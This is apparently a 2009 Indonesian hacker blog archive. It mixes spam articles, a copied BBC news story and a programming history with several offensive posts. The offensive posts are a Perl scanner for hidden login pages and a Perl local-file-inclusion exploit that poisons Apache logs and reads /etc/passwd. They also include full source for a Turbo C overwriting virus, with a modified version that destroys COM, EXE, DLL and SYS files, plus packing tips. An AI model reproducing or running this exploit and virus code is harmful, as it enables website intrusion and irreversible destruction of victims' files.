- v -

5 WAYS TO GET THE BEST DEAL ON VERIZON FIOS COMPUTER SERVICES

2009-09-14T13:07:00.000-07:00

Verizon FiOS - 5 Ways to Get the Best Deal on Verizon FiOS Services

Do you want to know how to get the best deal possible on the new Verizon FiOS services? Verizon FiOS is a cutting edge fiber optic based network for digital TV, digital VOIP phone and the fastest Internet connection on the market.

FiOS services are already a great value with prices that are about the same as or less than satellite and cable TV and Internet plans but there are some ways that you can get an even better deal on Verizon FiOS services. If you are hunting for the best deal possible on a new FiOS phone, Internet and TV services here are five ways to get a great deal:

1. Introductory Pricing - In most places new Verizon customers can get great trial offers on FiOS services. If you have never been a Verizon customer before or if you haven't tried the FiOS services before, you can qualify for introductory pricing from Verizon FiOS. The prices vary from location to location so you should talk to a local Verizon representative to find out what the introductory Verizon FiOS prices are in your area.

2. Bundles - Verizon FiOS Bundles are the best way to save money on FiOS products. If you already have Verizon wireless service you can get good deals on digital TV and high speed Internet. If you don't already have a phone then you can get Verizon FiOS TV, digital VOIP phone and high speed Internet for about $100 per month depending on where you live. That's called the Verizon FiOS Triple Play bundle and it's the most popular bundle that Verizon FiOS offers.

3. Upgrades - If you're already a Verizon customer and you want to upgrade to the FiOS network call a Verizon customer service rep or shop online to get special pricing for existing customers. Often you can upgrade to the FiOS network for a special rate since you're already a Verizon customer. You might even be able to get a free trial of the FiOS services if you are already a Verizon customer.

4. Talk to a Customer Service Rep - When you're signing up for the Verizon FiOS network it pays to talk with a customer service rep because often customer service reps are authorized to give promotional pricing to customers that fit certain criteria. When you call the customer service line for Verizon FiOS ask the customer service rep that you talk with about any available promotional pricing for students, new customers, or whatever group you fit into it. Chances are you can get some kind of deal that way.

5. Shop online - When you build a custom bundle for yourself online you can get lots of savings on the Verizon FiOS services. At http://iFiberCompany.comm, they are a consumers guide and resource to Verizon FiOS and offer great tips, articles and savings.

Sometimes it takes awhile to choose all the channels you want on your digital TV service and go through all the other many options that Verizon FiOS has but when you do you'll see that you can get great savings. You can also usually schedule the installation and confirm the installation appointment with a customer service rep all online.

perl login tester

2009-09-13T08:38:00.000-07:00

few months ago,i coded login-page tester with perl :)
so,here it is,it's simple and tiny :)
cool huh??

#!usr/bin/perl

#nethyni login tester by vires (optimized code)
#hehehehe coded this tiny one,coz i like tiny code :P
#greetz to all netheroes crews::lyly^,HellHag,gunX,dyvil
#black,ckarh,napicatraz,quintin,benny,2kangspu,hendra,byz9991
#all,sorry bro,i can't list u all here :P
#nethyni by vires,2009(www.netheroes.org)
#oh my,this greetz is almost longer than the code it self

use LWP::UserAgent;

$ua=LWP::UserAgent->new;
$ua->timeout(35);
$ua->agent("Mozilla/5.0");

$par=@ARGV;
if($par!=2)
{
print "greetz to all netheroes crews::lyly^,HellHag,gunX,dyvil\n";
print "black,ckarh,napicatraz,quintin,benny,2kangspu,hendra,byz9991\n";
print "all,sorry bro,i can't list u all here :P\n";
print "nethyni by vires,2009(www.netheroes.org)\n";
print "USAGE:perl nethyny.pl ";
}
else
{
$sites=$ARGV[0];
$data=$ARGV[1];

open (fold, $data) || die "error baca file data!!!\n";
@banyak = ;
close(fold);

foreach $datavi (@banyak){
chomp($datavi);
chomp($datavi);
chomp($datavi);
chomp($datavi);
$cek=$sites."/".$datavi;
$cek2=$cek;
vicrawl($cek);
$cek=$cek.".php";
vicrawl($cek);
$cek=$cek2.".asp";
vicrawl($cek);
}

sub vicrawl($){
$cex=$_[0];
$vires=$ua->get($cex);
open(vir,">>NETH.TXT");
print "\n[-] checking $cex";
if(!($vires->is_success))
{
$cekprot=$vires->status_line;
if($cekprot=~ m/404/)
{
print "\n $cekprot ==>gagal\n";
}else
{
print "\n $cekprot!!\n";
print vir $cex."\n";
}
}else
{
print "\n ==> Halaman ada!!\n";
print vir $cex."\n";
}
close(vir);
}
}

hack tool[nethALF]

2009-09-12T11:28:00.000-07:00

view months ago i just coded perl-based Local file inclusion bug exploit
just check the code,:)
enjoy!!!

#!usr/bin/perl
#06/07/2009 3:47 PM by vires
#nethALF(apache log File inject) by vires
#based on Osirys -> osirys[at]autistici[dot]org
#greetz to all netheroes crews::my love(fitri),lyly^,HellHag,gunX,dyvil
#black,ckarh,napicatraz,quintin,benny,2kangspu,hendra,byz9991
#all,sorry bro,i can't list u all here :P
#nethALF by vires,2009(www.netheroes.org)
#oh my,this greetz is almost longer than the code it self

use LWP::UserAgent;
use IO::Socket::INET;

$ua=LWP::UserAgent->new;
$ua->timeout(35);
$ua->agent("Mozilla/5.0");

$par=@ARGV;
if($par!=2)
{
print "greetz to all netheroes crews my love fitri:)\n";
print "nethALF by vires,2009(www.netheroes.org)\n";
print "USAGE:perl nethALF.pl ";
}
else
{
$sites=$ARGV[0];
$bugs=$ARGV[1];

my $php_code = "";

$sock = IO::Socket::INET->new(PeerAddr => $sites,PeerPort => 80,Proto => "tcp") || die "ga bisa connect ke $sites:80!\n";

print "[+] Injecting [for fitri]..\n";

print $sock "GET /viresfitri vires9".$php_code."9fitri"." HTTP/1.1\r\n";
print $sock "Host: ".$sites."\r\n";
print $sock "Connection: close\r\n\r\n";
close($sock);

$lfi="../../../../../../../../../../../../../..";
@datavi=qw(
/etc/passwd
/var/log/httpd/access_log
/var/log/httpd/access.log
/var/log/httpd/error.log
/var/log/httpd/error_log
/var/log/access_log
/logs/error.log
/logs/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/etc/httpd/logs/access_log
/usr/local/apache/logs/error_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/www/logs/access_log
/var/www/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error.log
/var/log/error_log
/apache/logs/error.log
/apache/logs/access.log
);

open(vir,">>NETH.TXT");
print vir "nethALF by vires for fitri\n";
close(vir);

while ($log = <@datavi>)
{
$fitri=$sites.$bugs.$lfi.$log."";
vicrawl($fitri);
}

sub vicrawl($){
open(vir,">>NETH.TXT");
$cex="http://".$_[0];
$vires=$ua->get($cex);
print "\n[-] checking $cex\n";
@isi=$vires->as_string;
$cza="@isi";
if($cza=~/root:/)
{
print "\n**[+] file passwd ".$cex;
}
if($cza=~/viresfitri/)
{
print "\n**[+] inject sukses di log ".$cex;
}
print vir $cex."\n";
close(vir);
}

}

A Brief History of Programing Language

2009-09-12T11:25:00.000-07:00

A Brief History of Programing Language

++++++++++ Pengertian dasar ++++++++++

Programing language atau kalo di indonesia disebut bahasa pemrograman merupakan
tata cara atau aturan dalam membuat perintah yang akan dijalankan oleh komputer.
Tata cara atau aturan yang digunakan juga sangat tergantung dari bahasa yang digunakan
seperti bahasa C,Assembly,VBasic,Delphi.

Tentu saja C punya aturan yang berbeda dengan VB atau Delphi.Mereka punya aturan sendiri-sendiri
yang terkadang menjadi ukuran kemampuan bahasa itu,baik kelemahan maupun kelebihan bahasa
itu sangat tergantung dari aturan itu.Contohnya Assembly,Assembly atau biasa disingkat Asm ini
punya kemampuan yang sangat powerfull pada komputer juga file eksekusi yang dihasilkan lebih
kecil ukurannya.Namun kekurangannya asm ini agak susah dalam aturannya,sehingga hanya orang
yang sudah ahli yang bisa memakai bahasa ini.Contoh tandingannya adalah VB,VB sangat mudah
dalam aturannya,bahkan VB ini merupakan bahasa pemrograman yang berbasis GUI sehingga
sangat mudah digunakan.Namun kelemahannya,jika dibandingkan dengan asm adalah file eksekusi
yang dihasilkan sangat jauh berbeda.Selain itu VB juga butuh file Runtime,yaitu MSVBVM60
(Tergantung Versinya).Sehingga jika file ini di hapus/tidak ada,maka file eksekusi yang dibuat dengan
VB tidak bisa dijalankan!.

++++++++++ Sejarah bahasa pemrograman ++++++++++

Pada awal komputer elektronik diciptakan,Komputer ini diusulkan untuk bekerja secara binary.
Ide ini datang dari ahli bernama John Von Neumann,dimana ini menjadi dasar pemrograman
Dengan adanya ide ini,maka komputer dapat dikendalikan dengan mudah(Tidak seperti komputer
Awal ciptaan Alan Turing yang Program di dalamnya Baku).Tentu saja,mengendalikannya dalam
bentuk biner juga.Misalkan ada perhitungan 5+6,dan misalkan juga biner dari 5=0101 dan biner dari
6=0110 dan biner dari +=1110,maka perintah yang diberikan pada komputer adalah

010111100110 (catatan:ini hanya contoh saja)

lalu bagaimana jika melakukan perhitungan yang rumit?perpangkatan misalnya?akar?yah itulah sebabnya
para ahli mulai berpikir untuk mngembangkan bahasa pemrograman yang lebih mudah di gunakan
karna penulisan program dengan biner sangat memakan waktu,sehingga terciptalah "Assembly".Assembly
Sudah menggunakan "Mnemonic"(Namanya sesuai fungsinya),sehingga lebih mudah diprogram ketimbang
memakai biner.Contohnya adalah perintah assembly ADD yang artinya menambahkan,ada juga SUB
yang artinya mengurangi.Tentu saja yang di hitung adalah operandnya.contoh syntaxnya:

ADD AX,BX ;Artinya jumlahkan isi register BX dengan AX dan simpan hasilnya di register AX

Bisa dibilang assembly adalah "rumus" dari pemrograman biner,karna memang assembly di ciptakan
agar lebih mudah ditulis syntaxnya.
Untuk syntax yang lain bisa anda pelajari lebih mendalam tentang bahasa assembly ini,anda juga
bisa mendapatkan e-book tentang assembly ini yang bisa di download gratis di jasakom(ditulis
oleh sto,master....:) meski untuk 16-bit tapi saya pikir memang masih sangat berguna.

Kemudian karna bahasa assembly dianggap masih terlalu susah untuk orang awam,maka dikembangkan
bahasa aras tinggi.Dimana penggunaanya sudah jauh lebih mudah karna menggunakan bahasa sehari-hari
(inggris).Bahasa yang awalnya diciptakan adalah "Fortran",dimana kemudian muncul bahasa-bahasa lain
seperti Pascal,C,Basic dan banyak bahasa pemrograman yang bersifat administratif semacam dbase.

++++++++++ Kegunaan ++++++++++

Penciptaan dan pengembangan bahasa pemrograman ini di picu oleh penggunaan PC(Personal Computer)
dimana komputer tidak hanya digunakan oleh Perusahaan Besar,tetapi juga dimiliki oleh masyarakat umum
Sehingga muncul pula perusahaan yang lebih kecil dan murah karna mereka tidak harus mempekerjakan
banyak karyawan atau memakai sistem penyimpanan kertas yang jauh lebih sulit ditangani dan lebih mahal!.
Contohnya aplikasi dbase yang menggeser fungsi kertas sebagai penyimpan data financial perusahaan.
Pascal di kembangkan oleh seorang profesor yang tujuannya untuk mengajarkan mahasiswanya tentang
algoritma,sehingga pascal ini mrupakan salah satu bahasa pemrograman yang dekat dengan kalangan
akademisi.Sedankan C dikembangkan untuk membuat bahasa pemrograman yang "sekuat" assembly namun
lebih mudah digunakan.Dimana C dikembangkan dari bahasa B,oleh Denis Ritchi di Lab AT&T Bell.Karna
komputer terus berkembangdan kebutuhan juga bertambah,maka bahasa ini juga ikut bertambah daftarnya
semacam bahasa LISP yang khusus digunakan untuk pemrograman Sistem Cerdas.

++++++++++ GUI Programming ++++++++++

Ketika Windows mulai menguasai pasar OS,Pemrograman berbasis GUI mulai muncul.Bahkan hal ini
dimulai juga oleh microsoft dengan mengeluarkan VB(Visual Basic) dimana bahasa ini merupakan
pengembangan dari bahasa basic.Munculnya VB dimaksudkan agar pemrogram mudah dalam membuat
membuat aplikasi berbasis GUI.Kemudian muncul pula Delphi yang diproduksi oleh berland.Bahasa
bahasa baru ini terus berkembang dari satu versi ke versi yang lain menuju kesempurnaan.

Demikian adalah perjalanan waktu kita tentang sejarah bahasa pemrograman,semoga bermanfaat
dan menambah ilmu anda semua.

vires
tegal 2007

idiot phpchat

2009-09-11T23:24:00.000-07:00

I just coded this codes few months ago..This simple PHP codes act like chat room for personal use :)
just check the code,very simple and idiot :)

<?
/*
idiot phpchat without dbase by vires
don't care how bad this code is,it's just working
n btw,ii just coded it in 15 minutes or less :P
greetz to all netheroes crews::v3 my love bella,lyly,hellhag,gunx,black
dyvil,mzlove,alinux,napicatraz,n all ,sorry!!!
*/
header('Refresh: 15');
$isi=$_POST['cinta'];
$cek=$_POST['cek'];
if($isi){
$isi="bella:".$isi;
$ci=fopen("bella.txt","a");
fwrite($ci,$isi."<br>");
fclose($ci);
}
$ci=fopen("bella.txt","r");
$isi2=fread($ci, filesize("bella.txt"));
fclose($ci);

echo "
<form action='chat2.php' method='POST'>
<input type='text' name='cinta'><input type='submit' name='cek' value='cinta'>
</form>";
echo $isi2."<br>";
?>

Virus dengan Turbo C

2009-09-11T23:11:00.000-07:00

Virus dengan Turbo C

++++++++++ Virus dengan Turbo C ++++++++++

Ketemu lagi dengan vires ,ya iyalah....mudah-mudahan ga pada
bosen ma tulisan-tulisanku.hehehehe.kali ini aku akan
menjelaskan source code virus yang diprogram dengan C(kali ini
aku pake Turbo C).Sebagai info kalo source ini aku dapat dari
internet dan dari tulisannya source ini sebelumnya sempat di
publish di Virology(kalo ga salah ini zine virus old skewl).
Tujuan dibuatnya tulisan ini adalah untuk pembelajaran semata
selain itu juga untuk memenuhi permintaan dari saudara NETS ku
Elkajeiny yang dulu sempat bertanya padaku tentang source ini.
Yah...ini dia....Source asli yang aku dapat dari internet.

DISCLAIMER:I (VIRES) AS AUTHOR OF THIS STUFF AND SMGHACK
NOT TAKE ANY RESPONSIBILITIES
FOR ANY DAMAGE CAUSED BY THIS SOURCE CODE/ARTICLE OR IT'S
COMPILED BINARY!
FOR EDUCATION PURPOSES ONLY
(STOP READING IF YOU ARE NOT AGREE!)

++++++++++ ORIGINAL SOURCE(FULL WITH COMMENTS) ++++++++++

/* This is a simple overwriting virus programmed in Turbo C */
/* It will infect all .COM files in the current directory */
/* Infections destroy the programs and cannot be cured */
/* It was presented in Virology 101 (c) 1993 Black Wolf */
/* FOR EDUCATIONAL PURPOSES ONLY, DO NOT RELEASE! */

#include
#include
#include

FILE *Virus,*Host;
int x,y,done;
char buff[256];
struct ffblk ffblk;

main()
{
done = findfirst("*.COM",&ffblk,0); /* Find a .COM file */
while (!done) /* Loop for all COM's in DIR*/
{
printf("Infecting %s\n", ffblk.ff_name); /* Inform user */
Virus=fopen(_argv[0],"rb"); /* Open infected file */
Host=fopen(ffblk.ff_name,"rb+"); /* Open new host file */

x=9504; /* Virus size - must */
/* be correct for the */
/* compiler it is made */
/* on, otherwise the */
/* entire virus may not*/
/* be copied!! */
while (x>256) /* OVERWRITE new Host */
{ /* Read/Write 256 byte */
fread(buff,256,1,Virus); /* chunks until bytes */
fwrite(buff,256,1,Host); /* left < 256 */
x-=256;
}
fread(buff,x,1,Virus); /* Finish off copy */
fwrite(buff,x,1,Host);
fcloseall(); /* Close both files and*/
done = findnext(&ffblk); /* go for another one. */
}
/* Activation would go */
/* here */
return (0); /* Terminate */
}

Yups itu yang barusan kamu liat adalah source asli yang aku dapatkan dari NETS
Dimana jika kamu Compiled and jadi EXE trus kamu jalanken maka percayalah
semua file dengan extensi COM di direktory aktif akan jadi virus!(Carefull)
Sengaja aku nggak terjemahin ke indo coz habis ini akan aku jelaskan teknik
yang sedikit aku tambahkan agar virus ini jadi multiinfektor(tidak hanya file
com),bagi yang sudah pernah "kenal" C pasti syntaxnya akan mudah dipahami.Dan
juga teknik yang aku tambakan bagi yang sudah kenal akan memahami logikanya!
Oke langsung saja versi dari VIRES!.

++++++++++ Virus in Turbo C (Modified by Vires) ++++++++++

/* This is Source was modified(lil' bit ,,by vires) */
/* It will infect COM,EXE,SYS,DLL,EveryThing if you want*/
/* Compiled at your own RISK,VIRES TEGAL 2007 */
/* FOR SMGINE(SMGHACK) #1 */

#include
#include
#include
#include
/*Header standar bro!*/

FILE *Virus,*Host;
int x,y,done;
char buff[256];
struct ffblk ffblk;/*type data struct */

int i;
char *ext[]={"*.com","*.exe","*.dll","*.sys",0};
/*ini beberapa data yang akan kita pake
liat tambahan data dari vires,yup aku pake array
untuk mendefinisikan type file yang kan di infek */

main()
{
for(i=0;ext[i];i++){ /*ini akan menghasilkan string dari com,exe,dll dan sys */
done = findfirst(ext[i],&ffblk,0); /* pertama cari file com dulu,
kemudian cari file exe...dan lanjut sampe sys */
while (!done) /* Kalo ketemu(done<>0)maka*/
{
printf("Infecting %s\n", ffblk.ff_name); /* tampilkan pesan(ff_name/nama file) */
Virus=fopen(_argv[0],"rb"); /* Operasi pointer file(buka file argv[0] */
Host=fopen(ffblk.ff_name,"rb+"); /* Atau bisa dibilang VIRUS itu sendiri */
/* rb artinya read-binary dan + artinya kita */
/* punya ijin meng-overwrite */
x=9534; /* Ukuran virusnya didefinisikan disini */
/* harus tepat(sesuai hasil kompilasi kamu) */
/* Kalo ga,hmm...ga bakalan ke kopi dg lengkap */
/* ato kalo kelebihan bisa makan memory deh....*/
/* Perlu diketahui ukuran ini adalah hasil*/
/* yg aku kompilasi dan telah aku pack pke UPX*/
/* dengan option terkecil -9,jadi memang untuk */
/* mendapatkan ukuran yg pas,kamu harus kompile dulu*/
/* trus diliat ukurannya(dalam bytes),ubah source ini*/
/* trus kompile lagi,kalo mau di pack pke upx */
/* ya kamu harus pack dulu baru,diliat ukurannya */
while (x>256) /* Kalo x>256 maka */
{ /* baca isi virus per byte sampe 256 bytes */
fread(buff,256,1,Virus); /* simpan di buff */
fwrite(buff,256,1,Host); /* tuliskan isi buff per byte sampe 256 bytes */
x-=256; /* Kurangkan X dengan 256(bytes yang telah dibaca) */
/* Muter keatas lagi(looping while),dimana X sekarang berkurang*/
/* 256 bytes!,kalo di basic jadi kayak gini X = X - 256 */
/* sedang di delphi/pascal X:= X - 256 */
/* sekarang jika x sudah tidak bisa dibagi dengan 256 */
/* atau artinya kurang dari 256 bytes ,maka looping whiole berakhir*/
/* Nah jika masih ada bytes tersisa maka */
}
fread(buff,x,1,Virus); /* baca sisanya!!!!ini sisa dari looping 256 bytes */
fwrite(buff,x,1,Host); /* tuliskan sisanya!!!!!! */
fcloseall(); /* Close semua operasi files */
done = findnext(&ffblk); /* ke handle file berikutnya!!!! */
}
}
/* Selesai */
/* Kembalikan kuasa ke OS */
return (0); /* Terminate */
}

Huah.....selesai juga,nglembur sampe malem nih...tapi yah tu semua aku lakukan untuk anda semua
(awas...biasanya orang yang bilang kayak gini ada maunya lho...xixixixixi),Maka dari itulah pilih
saya sebagai Gubernur DKI(nih...lagi jamannya kampanye DKI-1 hehehehe)...weleh malah ngelantur...
Oke deh saya rasa source diatas sudah menjelaskan semua,silahkan di kopi trus paste(wah..ngajarin ga
bener nih,maksudnya dipelajari dengan giat coz aku pikir C masih bisa diikuti algoritmanya).

++++++++++ Finishing!!!!!!!! ++++++++++

Yeah...walau sudah aku jelaskan dengan detail..aku masih takut ada yang belum dipahami dalam membuat
virus dengan Turbo C ini,jadi aku memutuskan bikin bagian ini lagi.
Oke di finishing ini akan aku jelaskan bahwa jika kamu akan membuat virus kamu jauh lebih kecil kamu
bisa mem-pack nya dengan UPX(ini yg aku pake) dengan option -9,ato perintah lengkapnya gini

UPX.EXE -9 VIRUS.EXE

kenapa musti pake UPX?????yeah karna ini adalah Program 16-bit maka ASPACK ga mau jalan,jadi aku pake
UPX(Ini memang favorite no.1),karna bisa mem-pack Program 16-bit yang dihasilkan oleh Turbo C yg aku
pake.Oke setelah di pack,kamu liat ukurannya virusnya(dengan klik kanan file trus properties),nah liat
ukurannya yg dalam bytes,trus jika tidak cocok dengan source,maka rubahlah!!!biar jadi pas...kan yg
pas-pas enak rasanya(apaan sich?$@**&%^).Trus perintah printf itu bisa kamu ilangin aja,khan kalo
virus harus kejem!!!!(heh...jangan,jangan jadi kejem lho!).Selain itu sebagai pelengkap,aku mo nyampein
ke Elkajeiny tentang

X - = 256;

Wah daripada nanti bingung lagi mending aku kasih syntax lengkap yang berhubungan dengan ini:

while (x>256) ==>ingetkan? sebelumnya x=ukuran virus(ex.9534)
{
fread(buff,256,1,Virus);==>baca 256 bytes,per byte dari virus
fwrite(buff,256,1,Host);==>tulis 256 bytes,per byte ke Host
x-=256; ==>setelah perintah ini maka x=x-256,artinya x akan dikurangi dengan 256
==>dan looping ini berakhir saat x<256(while>256) jadi jika virus kamu
==>ukurannya 9534 maka ini akan berakhir saat x=9472 (dalam hal ini,akan looping
==>37 kali(9534/256=37 sisa 62)tergantung dari ukuran virus kamu).lalu bytes terakhir?
==>yah...liat aja dari 9534 bytes yang ada pada virus hanya akan terbaca
==>9472 bytes jadi sisanya?x=62 bytes.Nah..itu sebabnya,kamu harus perhatiin syntax
==>berikutnya!.
}
fread(buff,x,1,Virus);==>baca sisanya!!ingetkan?x sekarang = 62 bytes!ini sisa dari looping 256
fwrite(buff,x,1,Host);==>yah...sampai sini pasti sudah jelas donk?????kalo belom???baca ulang dari
==>atas lagi!!

Lalu kemudian muncul pertanyaan,kenapa harus 256????Hahaha aku pikir karna keterbatasan kompiler lama
yang hanya terbatas sampe segitu.ternyata aku salah!aku kemudian coba membesarkan nilainya menjadi 1024
dan ternyata bekerja dengan baik.ini ternyata juga merupakan teknik optimized,namun hanya pada ukuran
filenya saja!.ketika aku merubahnya menjadi 1024,waktu eksekusi ternyata jadi semakin cepat namun ukuran
virusku nambah lagi!nah kalo kayak gini kamu yang harus milih,mau cepet?ato kecil?dan inget kalo kamu mau
membesarkan nilai ini maka variabel buff juga harus kamu gedein!jadi nanti buffnya jadi kayak gini:

char buff[1024];

gampangnya gini,kamu harus ngerubah semua angka 256 menjadi 1024 di dalam source diatas!.Oke sekian dulu
modifikasi dari vires yang aku coba-coba sendiri.

++++++++++ Optimized ++++++++++

Meski sub judul sebelumnya finishing tapi masih ada satu hal yang mau aku share disini.Yaitu tentang optimized
yang ada pada tubuh virus diatas yang kadang tidak bisa dipahami secara sekilas.Nah berikut contoh opimized
yang digunakan,dan sebagai perbandingan dalam ukuran virusnya!.

kode:

X - = 256 ,Optimized dari X = X - 256

Pengaruh????? jika pake X - =256 maka virus kamu ukurannya 13083 bytes,packed upx -9==> 9639
jika pake X = X - 256 maka virus kamu ukurannya 13083 bytes,packed upx -9 ==> 9641

trus di kode yang pake 1024(ganti dari 256)

pengaruh???? jika pake 256 di buffernya maka ukurannya 13083 bytes,packed upx -9==> 9639
jika pake 1024 di buffernya maka ukurannya 13851 bytes,packed upx -9==> 9644

lho katanya optimized???kok ukurannya tambah besar???mungkin itu pertanyaan anda.Tapi liat
ukuran buffer yang membesar,dengan begini artinya looping di while akan berkurnag khan?
9639/256>9644/1024
atau perbandingannya 37:9,,lalu apa pengaruhnya vi???hehehe inget khan waktu eksekusi???
dengan keadaan begini waktu eksekusi program kamu jadi semakin singkat!.menarik???
tentu saja.nah korbankan virus dengan nambah beberapa bytes namun lebih cepat ga sayang khan?
dan yah...masih banyak "rahasia" di dalam C yang bisa kamu
exploitasi!kalo begitu aku tunggu modifikasi dan optimized dari kamu.Oke?

Does The Computer Need A Defrag?

2009-09-11T00:39:00.000-07:00

To defrag or not to defrag...that is the question. Before answering this question, though, it may be helpful to know a bit about what defrag is, why it exists, and when does one need to do it. Yes, this implies that not all computers need to be or should be defragmented.

The utility or program called a disk defragmenter is usually used in Windows computers. It serves to solve problems that may arise because of the method of data storage that hard disks use to store data.

There are three main functions of the hard drive and the limitations of those functions are the reason for the break-up of files on the disk. Hard drives store data in clusters called sectors. Sectors hold a finite amount of data, either 256 or 512 bytes. The hard drive has a small arm that moves around the surface of the disk.

The arm has heads for the purpose of reading and writing data onto the platters, which is where the sectors and tracks are located on a hard drive. The arm moves the heads into position when the CPU requests a file, or a particular collection of bytes, then waits for the platter to spin the sectors into position for the heads to access the data and send it byte by byte to the CPU for usage.

As you can guess, this makes hard disks very, very slow when compared with other technological processes within a computer's memory. When compared side by side with the computer's processor and speed of memory, it can appear that the time a hard disk needs to work its magic takes a millennium in time.

Defragmentation is the operation that will lessen the time the arm needs to move around on the disk platter looking for information in the sectors. It helps organize data on the hard drive into sequential segments on the disk.

After you have performed the operation, the arm moves less because related data is stored together instead of on several cluster sectors of unrelated material, keeping the arm in constant motion as it attempts to get all of the requested information to the CPU. The more the arm has to move to place the heads in position, the more time it takes to complete the process.

So, why doesn't a Windows computer store data sequentially to begin with, you ask? It does...or at least, in the beginning it does, when the disk is new and therefore empty. The problems begin to occur after the disk has some files erased or when the disk has been in use for a while and has a great many of these deleted areas of data as happens with all Windows computers that have been in use for a while.

The utility program allows those gaps from deleted and erased data, no longer needed by the user, to disappear as it rearranges the files that are currently on the computer into sequential order for easier access.

Good programs go a step beyond and place application files close to the operating system files so that the time for reboots is diminished dramatically since the arm has to move very little to access the application's files after accessing the operating system's files. The order that the program uses to organize the files is the same order in which files that are consistently used by the computer are stored.

As you may have guessed, this is not a quick process. It typically takes hours for the process to be completed. However, this can improve the performance and speed of your computer. It is recommended that the program be run during the hours you sleep, to experience the least amount of downtime as you cannot be running other applications during the process, as this will cause the software to work improperly.

About the Author

Victor Epand is an expert consultant for computer memory, PC supplies, and computer games. When shopping, we recommend the best online stores for PC supplies, software for defragging your hard drive, computer memory, RAM, and used computer games.

melacak-jejak-via-google

2009-09-11T00:35:00.000-07:00

Google telah mengembangkan suatu layanan baru. 'Google Latitude' - adalah sebuah layanan untuk melacak posisi keberadaan teman-teman Anda. Google Latidude akan memungkinkan Anda melihat posisi teman Anda berada pada peta, dan juga akan berhubungan langsung via SMS, Google Talk, Gmail, atau memperbarui status pesan.

Google Latitude adalah fitur baru untuk Google Maps yang tersedia pada ponsel dan juga sebuah gadget iGoogle untuk di komputer Anda. Untuk layanan via ponsel Anda dapat mengunjungi google.com/Latitude. Kemudia dari link tadi anda dapat mendownload Google Maps. Layanan Google Latitude sudah mendukung perangkat mobile yang populer saat ini seperti smartphone platform Android, Blackberry, Symbian S60, dan Windows Mobile. Sedangkan pada komputer, [...]Anda mengakses http://google.com/latitude dari browser Anda dan menambahkan Latitude gadget ke situs iGoogle.

Masalah privasi telah dikontrol dengan baik bagi yang melihat lokasi Anda, dan juga apa saja yang mereka lihat dilokasi tersebut. Video ini menunjukkan tips tentang cara menyesuaikan pengaturan privasi di Latitude.

Pelacakan teman-teman Anda secara real time memberikan pengalaman baru. Google menjadikan Latitude sebagai layanan baru di tingkat interaksi sosial seperti tak pernah ada sebelumnya. Sekarang tersedia di 27 negara dan 42 bahasa! Apakah anda mau mencoba?

Google books deal battle heats up

2009-09-10T13:06:00.000-07:00

One of Google's aims is to "bring the world's lost literature back to life"

The battle over Google's effort to digitise the world's books and create a vast online library has intensified.

Authors have until Friday to opt out of the $125m settlement the search giant made with authors and publishers.

The date for comments to the New York court overseeing the class action suit was extended from Friday to Tuesday, after the filing system went down.

As time ticks away, supporters and critics have been manning both sides of the debate to win the public case.

'Civil right'

The settlement reached last October stemmed from a 2005 legal suit that Google faced for scanning out-of-print works without explicit permission from rights holders.

If approved by a judge, Google would create a Book Rights Registry where authors and publishers could register works and be compensated.

The US Student Association says access is the key in this settlement

Ahead of Friday's opt-out for authors, Google lined up a number of professors, students and civil rights activists who support the deal.

"We see access to knowledge as a civil right," Wade Henderson, president and chief executive of the Leadership Conference on Civil Rights, told reporters in a conference call.

"Information enables individuals to learn, to create and to pursue their dreams. Access to knowledge defines the meaning of equal opportunity in a democratic society," said Mr Henderson.

Access was also the issue that led the United States Student Association to throw its weight behind the Google books programme.

"Today, millions of books are accessible only to the privileged few who are accepted to universities and can actually afford to attend," said association president Gregory Cendana.

"With Google books, any student anywhere in the US will have the books in the greatest libraries of the world at their fingertips."

'Unfair'

The most vocal critics of the deal have largely banded together to form the Open Book Alliance. It was set up by the non-profit Internet Archive, which has its own book-scanning project and has to date digitised 500,000 books.

Amazon is one of the big names trying to kill the Google books deal

"Just as Gutenberg's invention of the printing press more than 700 years ago ushered in a new era of knowledge sharing, the mass digitisation of books promises to revolutionise how we read and discover books," said Peter Brantley of the alliance.

"But a digital library controlled by a single company and small group of publishers would inevitably lead to higher prices and subpar services for consumers, libraries, scholars and students."

Technology giants Yahoo, Microsoft and Amazon are part of the coalition along with a number of libraries and writers and journalists groups.

Amazon, which competes with Google by scanning books to sell through its electronic Kindle reader, filed its own statement against the deal this week.

"It is unfair to authors, publishers and others whose works would be the subject of a compulsory licence for the life of the copyright in favour of Google and the newly created Book Rights Registry," it stated.

'Fact, not fiction'

The settlement is being examined by the Department of Justice which is also deciding whether to oppose the agreement.

Meanwhile the Federal Trades Commission has told Google to develop a privacy policy to limit use of users' data.
Woman in bookshop
Critics are concerned about everything from privacy to pricing

Google has responded by drawing up a new privacy policy covering its digital library, which to date includes 10 million books.

"We'll work to ensure that the privacy of online readers is fact, not fiction," said FTC chairman Jon Leibowitz.

Many believe the issue of rights over out-of-print books would best be solved by legislation and not the courts.

"It is never a good thing for private parties to make deals for the public good," said Martin Manley, the founder of Alibris.com, an online store which sells used, rare and out-of-print books.

"The public good is meant to be solved by regulators who are somewhat accountable and by legislators who are wholly accountable," Mr Manley told BBC News.

source : http://news.bbc.co.uk/2/hi/technology/8237271.stm

NYC Ventrilo Computer Servers Cheap!

2009-09-09T06:15:00.001-07:00

Are you a New York based gamer looking for exceptional voice performance for your Guild? There is absolutely nothing like cranking up your latest game and experiencing other gamers as if they were sitting in the room with. So, based on a lot of our experience, let me give you 3 main points to consider.

• NYC Gamers! Now you can have smooth, high quality communications without dealing with those expensive and confusing in game programs…. You know the ones that sound like you're talking through a straw. Dedicated Ventrilo servers are simple and easy to use, and allow communication with up to one hundred individuals that can be subdivided into competitive clans.

Even better as that many Ventrilo servers are fast with no voice hesitation which this amazing quality is achieved by having server locations throughout the NYC area.

This guarantees a clear and quick connection without waiting for open bandwidth space or line availability. Unlike other server hosts, NYC-based Ventrilo servers can be accessed immediately.

There are no delays. Simply fill out a basic form and provide a valid credit card and begin gaming immediately. If you have experienced poor service or quality from other gaming servers, then we can promise you that there are other providers that offer great service, great performance, and our cheap (less than $4 per month in some cases)..

